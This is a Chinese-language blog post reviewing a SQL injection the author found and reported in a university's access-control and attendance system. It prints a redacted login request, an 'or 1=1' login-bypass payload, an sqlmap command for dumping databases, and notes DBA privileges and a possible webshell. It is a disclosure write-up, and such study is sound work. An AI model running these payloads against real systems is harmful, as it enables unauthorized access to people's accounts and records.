某校园门禁系统高危 SQL 注入漏洞挖掘复盘

📅 2026/7/7 16:49:23
某校园门禁系统高危 SQL 注入漏洞挖掘复盘
好久没更博客了最近挖了下洞分享个 sql 注入的案例说明漏洞已提交学校并确认修复。本文保留挖掘思路和关键 payload目标域名、Cookie、账号、人员数据等敏感信息已脱敏。这次测试的是某高校 WebVPN 后方的一套门禁/考勤系统。入口是一个常规登录页字段包括账号、密码和验证码。先抓登录请求包登录请求大致如下真实 Host、Cookie、路径已经脱敏POST /http/xxx/Page/NewSetting/Handler/LoginHandler.ashx?cmdLoginenlink-vpn HTTP/1.1 Host: xxx.xxx.xxx.edu.cn Cookie:ENSSESSIONIDxxxxxxxxxmxx1;clientInfoeyJ1c2xxxxxxx;GUESTSESSIONIDxxxxxxxx; vpn_timestamp17xxxx29 Content-Length: 62 Sec-Ch-Ua-Platform: Windows X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 Edg/148.0.0.0 Accept: application/json, text/javascript, */*; q0.01 Sec-Ch-Ua: Chromium;v148, Microsoft Edge;v148, Not/A)Brand;v99 Content-Type: application/x-www-form-urlencoded; charsetUTF-8 Sec-Ch-Ua-Mobile: ?0 Origin: https://xxx.xxx.xxx.edu.cn Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://xxx.xxx.xxx.edu.cn/http/xxxxxxx/Page/NewSetting/Login.aspx Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6 Priority: u1, i Connection: keep-alive LoginTypeaccountUserNamexxxPasswordxxxValiCodexxxxxx发现用户名和密码存在明文传输并且验证码存在复用对于登录失败次数和请求频率未做任何限制可以一直重放也可以进行用户名和密码爆破爆破常见用户名和一些弱口令无果继续测试其他漏洞发现 UserName 参数存在 sql 注入通过报错信息发现后端为 oracle 数据库一开始尝试使用常见的引号和括号的组合进行闭合发现都没办法正常闭合想到可能是数字型的sql注入果然使用万能密码登陆成功PayloadLoginTypeaccountUserName1%20or%2011Password111ValiCode50285进入系统后可以看到门禁/考勤相关页面包括人员信息、账号、卡号、时间和地点等这里还可以往后遍历用户很多老师的账号都可以实现无密码直接登录这里除了万能密码我们甚至可以直接查所有的数据比如查数据库名sqlmap -r .\1.txt --batch --dbs并且验证发现current user is DBA: True账号具备 DBA 权限至此未做进一步测试如果绝对路径能探测到并且当前情况来看是较高权限用户可能导致webshell写入危害将进一步扩大。Sql 注入一般都是高危起步目前该漏洞已修复